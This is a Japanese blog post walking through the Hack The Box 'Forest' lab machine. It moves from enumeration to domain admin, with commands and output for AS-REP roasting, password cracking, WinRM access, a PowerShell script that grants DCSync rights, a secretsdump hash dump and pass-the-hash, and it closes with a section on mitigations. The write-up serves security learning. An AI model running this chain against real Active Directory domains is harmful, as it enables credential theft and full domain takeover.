Help us understand the problem. What is going on with this article?

Hack The Box: Forest Walkthrough (Japanese)

注意

このWalkthroughはHack The Box(以下、HTB)の問題であるForestの解説を目的とした記事です。不正アクセス等の違法行為を助長するものではありません。

はじめに

某氏にHTBの存在を教えてもらって、試しにWindows環境の侵入から権限昇格までを体験した。とても難しかったけど、Forumのおかげでなんとか権限昇格まで行けた。というか、権限昇格含むサーバの攻略自体はじめてだったので他のHTBのWalkthroughを参考にしまくりました。
シンプルなWalkthroughになっていますが、無限に寄り道をしていて解くのに40時間くらいかかった気がします。

Infocardは次のとおり。
スクリーンショット 2020-03-22 17.45.26.png

Walkthrough

nmapスキャン

HTBはまずnmapからという風潮があるようなので放ってみる。

kali@kali:~/Desktop/hackthebox$ sudo nmap -p 1-65535 -sV -sS -T4 forest

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 18:41 JST
Nmap scan report for forest (10.10.10.161)
Host is up (0.18s latency).
Not shown: 65492 closed ports
PORT      STATE    SERVICE      VERSION
53/tcp    open     domain?
88/tcp    open     kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-27 10:10:25Z)
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
140/tcp   filtered emfis-data
367/tcp   filtered mortgageware
389/tcp   open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
1258/tcp  filtered opennl
2538/tcp  filtered vnwk-prapi
3268/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
4079/tcp  filtered santools
5985/tcp  open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6259/tcp  filtered unknown
7045/tcp  filtered unknown
8275/tcp  filtered unknown
9389/tcp  open     mc-nmf       .NET Message Framing
13708/tcp filtered netbackup
14153/tcp filtered unknown
29890/tcp filtered unknown
34453/tcp filtered unknown
44154/tcp filtered unknown
47001/tcp open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49496/tcp filtered unknown
49664/tcp open     msrpc        Microsoft Windows RPC
49665/tcp open     msrpc        Microsoft Windows RPC
49666/tcp open     msrpc        Microsoft Windows RPC
49667/tcp open     msrpc        Microsoft Windows RPC
49671/tcp open     tcpwrapped
49676/tcp open     msrpc        Microsoft Windows RPC
49677/tcp open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
49684/tcp open     msrpc        Microsoft Windows RPC
49698/tcp open     tcpwrapped
49717/tcp open     tcpwrapped
51352/tcp filtered unknown
51624/tcp filtered unknown
54203/tcp filtered unknown
54253/tcp filtered unknown
64363/tcp filtered unknown
~snip~

Windows Server 2016であることや88/tcp, 135/tcp, 389/tcpが開いている事がわかる。この時点でActive Directoryサーバなのかな?という想像がつく。

enum4linux

Forumを見るとenumerationという言葉が複数回出てくる。
ググっていたときに見つけたコマンドがこれ。
有用そうなところを一部抜粋。

kali@kali:~/Desktop/hackthebox/setup$ enum4linux forest
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 26 22:55:17 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... forest
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =======================
|    Users on forest    |
 =======================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA  Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator  Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy  Name: Andy Hislip   Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1  Name: HealthMailbox-EXCH01-010  Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e  Name: HealthMailbox-EXCH01-003  Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678  Name: HealthMailbox-EXCH01-005  Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e  Name: HealthMailbox-EXCH01-009  Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781  Name: HealthMailbox-EXCH01-006  Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d  Name: HealthMailbox-EXCH01-004  Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64  Name: HealthMailbox-EXCH01-008  Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9  Name: HealthMailbox-EXCH01-002  Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722  Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013  Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad  Name: HealthMailbox-EXCH01-001  Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238  Name: HealthMailbox-EXCH01-007  Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda   Name: Lucinda Berger    Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark  Name: Mark Brandt   Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez   Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron   Desc: (null)
index: 0x2373 RID: 0x1db2 acb: 0x00000010 Account: sm   Name: (null)    Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb  Name: Microsoft Exchange Migration  Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb  Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}   Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb  Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18  Name: Discovery Search Mailbox  Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a  Name: Microsoft Exchange    Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb  Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549  Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b  Name: Microsoft Exchange    Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b  Name: Microsoft Exchange    Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account:   Name: svc-alfresco  Desc: (null)
index: 0x2372 RID: 0x1db1 acb: 0x00000010 Account: test123  Name: (null)    Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[test123] rid:[0x1db1]
user:[sm] rid:[0x1db2]

 ===================================
|    Share Enumeration on forest    |
 ===================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

    Sharename       Type      Comment
    ---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on forest

 ==============================================
|    Password Policy Information for forest    |
 ==============================================
[+] Found domain(s):

    [+] HTB
    [+] Builtin

[+] Password Info for Domain: HTB

    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes
    [+] Password Complexity Flags: 000000

    [+] Domain Refuse Password Change: 0
    [+] Domain Password Store Cleartext: 0
    [+] Domain Password Lockout Admins: 0
    [+] Domain Password No Clear Change: 0
    [+] Domain Password No Anon Change: 0
    [+] Domain Password Complex: 0

    [+] Minimum password age: 1 day 4 minutes
    [+] Reset Account Lockout Counter: 30 minutes
    [+] Locked Account Duration: 30 minutes
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7


 ========================
|    Groups on forest    |
 ========================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]

なんか色々情報が出ている。

Impacket GetNPUsers.py

GetNPUsers.pyではKerberos認証において、事前認証をしていないユーザからTGTを入手します。
Kerberos認証ではTGTを取得する際に、正規のPCからの要求かどうかの事前認証を行うことができます。PCからタイムスタンプなどをユーザのパスワード用いて暗号化したデータをKDCに送りつけます。それをKDC側で検証することによって、パスワードを知っているPCからのみの要求を受け付けます。(要検証)
事前認証を設定していないと任意のPCからTGTを取得できるので、TGT取得後にセッション鍵部分に対してブルートフォースをされてしまう恐れがあります。

見つけたユーザをファイル usernames.txt に書いてコマンドを実行します。

$ python GetNPUsers.py HTB/ -usersfile usernames.txt -dc-ip 10.10.10.161
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

$krb5asrep$23$svc-alfresco@HTB:a6be4868d34535d2be85708012228a4e$1773f2db3dd0f55878dd09f9997efce7498d20395c31c3a8b8ecb1d2ab293de1d32e8d566419801da9b8540dd117261af369804c10b07164ab1aa0576f75e46a793169966afc4acca4f1422846f7fd32a390873fb8b60515207e0bbf833ccfdf28d8ff6722e373688f9e11e2cec6e68426b91c011f7e93b06f522a589e0a119bb5b0dae58141809711c68bdac85e697277685b4795f9d68f35f7617ab1250cba534d69268f5ac5cde3601a14fcabd536a36b3a6b8b3a2c704363879df6d24c27619bc6309978e0534a6b526ae4845252956fc6c39f8eab0faedfd88d5f8f7bf6

John The Ripper

TGTのセッション鍵部分を入手したのでこのデータに対してブルートフォースを行います。パスワードの複雑さは重要ですね。

$ john ./hashes.asreproast --wordlist=/usr/share/wordlists/rockyou.txt --format:krb5asrep
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:05 DONE (2020-03-22 20:29) 0.1890g/s 772355p/s 772355c/s 772355C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

svc-alfrescoのパスワードは s3rvice であることがわかりました。

Evil-WinRM

なぜかは忘れましたが(開いているポートに片っ端からHTTPでアクセスしたとき?)、WinRM使えるじゃんと思っていました。 別のWalkthroughでEvil-WinRMの存在は知っていたので使ってみました。
Windows Remote Managementとはその名のとおり遠隔操作するためのサービス。接続するとPowerShellで色々できるようになる。(Linuxでいうsshみたいな?)

John The Ripperで入手したパスワードをもとにログイン後、userのFlagをゲットします!

ruby evil-winrm/evil-winrm.rb -i htb.local -u svc-alfresco -p s3rvice

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type ../Desktop/user.txt
e5e4e47ae7022664cda6eb013fb0d9ed

その後、適当な情報を得ておきましょう。

whoami /all
net user /domain
Get-ADUser svc-alfresco -properties *
Get-ADOrganizationalUnit -Filter *
Get-ADGroup -Filter *
Get-ADGroupMember <group name>

BloodHound

AD内の情報を可視化してくれるツール。現在のユーザからDomain Adminsまでのパスを表示してくれたり便利ツール。
使うには SharpHound というツールを使って情報収集後、BloodHoundに流し込む必要がある。

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.ps1
Info: Uploading SharpHound.ps1 to C:\Users\svc-alfresco\Documents\SharpHound.ps1

Data: 1297080 bytes of 1297080 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Import-module ./SharpHound.ps1*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-module ./SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV -NoSaveCache

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
    Directory: C:\Users\svc-alfresco\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/22/2020   5:10 AM          15381 20200322051006_BloodHound.zip
-a----        3/21/2020  11:17 PM        3279549 powerview.ps1
-a----        3/22/2020   5:09 AM         972811 SharpHound.ps1
-a----        3/22/2020   2:12 AM         241152 winPEAS.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20200322051006_BloodHound.zip

Info: Downloading C:\Users\svc-alfresco\Documents\20200322051006_BloodHound.zip to 20200322051006_BloodHound.zip

Info: Download successful!

ここらへんからわけわからなくなる

このzipファイルをBloodHoundに流し込みます。UI上からゴニョゴニョすると次の画像のような情報を得ることができます。
スクリーンショット 2020-03-22 21.09.45.png
svc-alfresco から Administrator までの経路上で重要なのは svc-alfrescoEXCHANGE WINDOWS PERMISSIONS に対してすべての権限(GenericAll)を有していることです。(緑枠部分)
そして、そのグループはドメインに対してDACLの変更権限(WriteDacl)の権限を有しています。(青枠部分)
ということは、自分が EXCHANGE WINDOWS PERMISSIONS になれば何でもできるということですね。
(というかここがあっている?)

Powershell

Exchange関連の権限が悪用できることからググると記事を見つけた。
https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/DomainObject.md

内容としてはDCSyncをやるための権限を自分に付与してやっちゃえよという内容であったため、記事の内容どおりにやってみる。

# ユーザを追加して
$passwd = ConvertTo-SecureString "oijjp9iojoiasjdfiouehjwhjp99834" -AsPlainText -Force
New-ADUser labuser07 -Path "OU=Microsoft Exchange Security Groups,DC=htb,DC=local" -AccountPassword $passwd -Enabled $true -UserPrincipalName labuser07@htb.local

# 既存の強そうなグループに入れまくる
Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members labuser07
Add-ADGroupMember -Identity "Remote Management Users" -Members labuser07
Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members labuser07

# labuser07にログイン後、DCSyncに必要な権限を付与する
import-module ActiveDirectory
$acl = get-acl "ad:DC=htb,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = new-object System.Security.Principal.SecurityIdentifier $user.SID

# Ds-Replication-Get-Changes-All
$objectguid = new-object Guid  1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)

# Ds-Replication-Get-Changes
$objectguid = new-object Guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
Set-acl -aclobject $acl "ad:DC=htb,DC=local"

本当に権限が付与されているのか確認をする。

*Evil-WinRM* PS C:\Users\labuser07\Documents> (Get-Acl "ad:/DC=htb,DC=local").Access | Where-Object {$_.IdentityReference -eq "HTB\labuser07"}


ActiveDirectoryRights : ExtendedRight
InheritanceType       : None
ObjectType            : 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : ObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : HTB\labuser07
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

ActiveDirectoryRights : ExtendedRight
InheritanceType       : None
ObjectType            : 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : ObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : HTB\labuser07
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

されていた。

Impacket secretsdump

DCSyncする。
このツールでは様々な方法でDumpを試みるようだがどうやってどこまでDumpするのかはまだわからない。。

$ impacket-secretsdump -just-dc htb.local/labuser07:oijjp9iojoiasjdfiouehjwhjp99834@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
~(snip)~

pth-winexe

Pass The Hashを行うツール。
ざっくりいうとパスワードがわからなくてもNTLMハッシュさえわかってしまえば、NTLMv2の仕様上の認証応答のパケットを作れてしまうため、ログインできてしまうということ。

$ pth-winexe -U htb.local/Administrator%aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 //10.10.10.161 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc
C:\Windows\system32>whoami && hostname
whoami && hostname
htb\administrator
FOREST

rootとれた。

原因

このboxはreal-lifeが高いので原因を考えてみた。

1. Kerberos認証において、事前認証を有効化していなかった。

この設定さえ有効にしていれば、ローカルでブルートフォースされなかった。
https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx

対策

  • Kerberos認証の事前認証はデフォルトで有効化されているので設定を変えない。
  • コマンドを使って DONT_REQUIRE_PREAUTH のユーザを探す。
    • Get-ADUser -Filter {userAccountControl -band 4194304}
    • 上記記事内の KerbPreAuth.vbs

2. 複雑なパスワードを使っていなかった。

難しい問題ではあるが、O365の管理者ドキュメントには失敗例と成功例が載せてあり、面白い。
https://docs.microsoft.com/ja-jp/microsoft-365/admin/misc/password-policy-recommendations
今回のケースだと、ある程度の権限を持ったユーザが取られてしまったためそういう権限をもつユーザだけでも多要素認証が必要なのかも。

対策

  • 多要素認証を使う。
  • いいパスワードを利用するよう教育を行う。

3. Exchangeインストール後に適切な権限設定ができていなかった。

svc-alfrescoAccount Operatorsに所属していますが、Exchangeインストール後にはこのセキュリティグループから Exchange Windows Permissionsに対しての権限が割り当てられます。
この仕様についてMicrosoftがドキュメントを出していた。
https://support.microsoft.com/ja-jp/help/4490059/using-shared-permissions-model-to-run-exchange-server

対策

  • 定期的な権限の棚卸しを行う。
  • 組織内でBloodHoundを動かしてみる。

最後に

ADの管理をしたことがないのでどうなっているのかさっぱり。
HTBを通して学んでいこうと思う。

Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
Comments
No comments
Sign up for free and join this conversation.
If you already have a Qiita account
Why do not you register as a user and use Qiita more conveniently?
You need to log in to use this function. Qiita can be used more conveniently after logging in.
You seem to be reading articles frequently this month. Qiita can be used more conveniently after logging in.
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
ユーザーは見つかりませんでした